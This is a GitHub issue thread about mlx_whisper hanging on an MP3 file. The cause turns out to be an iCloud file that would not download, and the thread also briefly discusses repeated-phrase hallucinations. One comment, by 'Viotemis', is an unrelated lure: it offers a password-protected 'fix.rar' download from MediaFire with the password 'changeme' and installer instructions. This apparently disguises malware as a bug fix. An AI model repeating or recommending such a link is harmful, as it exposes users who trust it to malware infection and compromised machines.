### ISSUE TITLE
Whisper stalls on MP3

### ISSUE THREAD

**Issue by jrp2014** [ml-explore/mlx-examples#958] opened 2024-08-27 14:46 UTC
Running mlx_whisper against a .wav version of the same audio gets into detecting language and transcribing fairly quickly.  Doing the same with the original .mp3 just leads to the process hanging (so I ^C'd out):

```
mlx_whisper --model mlx-community/whisper-large-v3-mlx  ~/Documents/Story.mp3
Args: {'audio': ['/Users/jrp/Documents/Story.mp3'], 'model': 'mlx-community/whisper-large-v3-mlx', 'output_dir': '.', 'output_format': 'txt', 'verbose': True, 'task': 'transcribe', 'language': None, 'temperature': 0, 'best_of': 5, 'patience': None, 'length_penalty': None, 'suppress_tokens': '-1', 'initial_prompt': None, 'condition_on_previous_text': True, 'fp16': True, 'compression_ratio_threshold': 2.4, 'logprob_threshold': -1.0, 'no_speech_threshold': 0.6, 'word_timestamps': False, 'prepend_punctuations': '"\'“¿([{-', 'append_punctuations': '"\'.。,，!！?？:：”)]}、', 'highlight_words': False, 'max_line_width': None, 'max_line_count': None, 'max_words_per_line': None, 'hallucination_silence_threshold': None, 'clip_timestamps': '0'}
Fetching 4 files: 100%|█████████████████████████████████████████████| 4/4 [00:00<00:00, 66841.50it/s]
^CTraceback (most recent call last):
  File "/opt/homebrew/Caskroom/miniconda/base/envs/mlx/bin/mlx_whisper", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/opt/homebrew/Caskroom/miniconda/base/envs/mlx/lib/python3.12/site-packages/mlx_whisper/cli.py", line 224, in main
    result = transcribe(
             ^^^^^^^^^^^
  File "/opt/homebrew/Caskroom/miniconda/base/envs/mlx/lib/python3.12/site-packages/mlx_whisper/transcribe.py", line 150, in transcribe
    mel = log_mel_spectrogram(audio, n_mels=model.dims.n_mels, padding=N_SAMPLES)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Caskroom/miniconda/base/envs/mlx/lib/python3.12/site-packages/mlx_whisper/audio.py", line 155, in log_mel_spectrogram
    audio = load_audio(audio)
            ^^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Caskroom/miniconda/base/envs/mlx/lib/python3.12/site-packages/mlx_whisper/audio.py", line 57, in load_audio
    out = run(cmd, capture_output=True, check=True).stdout
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Caskroom/miniconda/base/envs/mlx/lib/python3.12/subprocess.py", line 550, in run
    stdout, stderr = process.communicate(input, timeout=timeout)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Caskroom/miniconda/base/envs/mlx/lib/python3.12/subprocess.py", line 1209, in communicate
    stdout, stderr = self._communicate(input, endtime, timeout)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Caskroom/miniconda/base/envs/mlx/lib/python3.12/subprocess.py", line 2108, in _communicate
    ready = selector.select(timeout)
            ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Caskroom/miniconda/base/envs/mlx/lib/python3.12/selectors.py", line 415, in select
    fd_event_list = self._selector.poll(timeout)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
KeyboardInterrupt
```

I assume that this is a bug of some sort.

This version of whisper still results in a lot of stuttering (ie, repeated words or lines).  Not sure whether this is just covering silences or sound glitches, but it makes whisper almost unusable as you need to read everything through and play back to find out the problem.  (The bits that are transcribed in between are almost flawless.)

**Comment by Viotemis** [comment] 2024-08-27 14:52
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by awni** [comment] 2024-08-27 15:03
> This version of whisper still results in a lot of stuttering

Can you elaborate? You see the stuttering even with the .wav file?

**Comment by jrp2014** [comment] 2024-08-27 17:44
Yes.  I think that it is often referred to as just hallucination.  It ends up repeating phrases, then picks up the thread again for a bit, then repeats, ad nauseam.

**Comment by awni** [comment] 2024-08-27 18:55
I remember our [discussion on this](https://github.com/ml-explore/mlx-examples/issues/774) was not resolved. Part of the problem is it's not so simple to reproduce. Are you able to share a audio for which that happens?

**Comment by jrp2014** [comment] 2024-08-27 20:12
I'm afraid that I can't, I'm sorry to say.

**Comment by jrp2014** [comment] 2024-08-27 21:01
It turns out the mp3 problem is nothing to do with MP3, but that the file is in iCloud (and it doesn't seem to want to download):  "The operation couldn’t be completed. (NSFileProviderErrorDomain error -2005.)" which means nothing to me.

**Comment by awni** [comment] 2024-08-27 21:03
Ok.. so let's close this. We can keep #774 open. If we can find a repor hopefully we can find a fix.

**Closed by awni** 2024-08-27 21:03 UTC
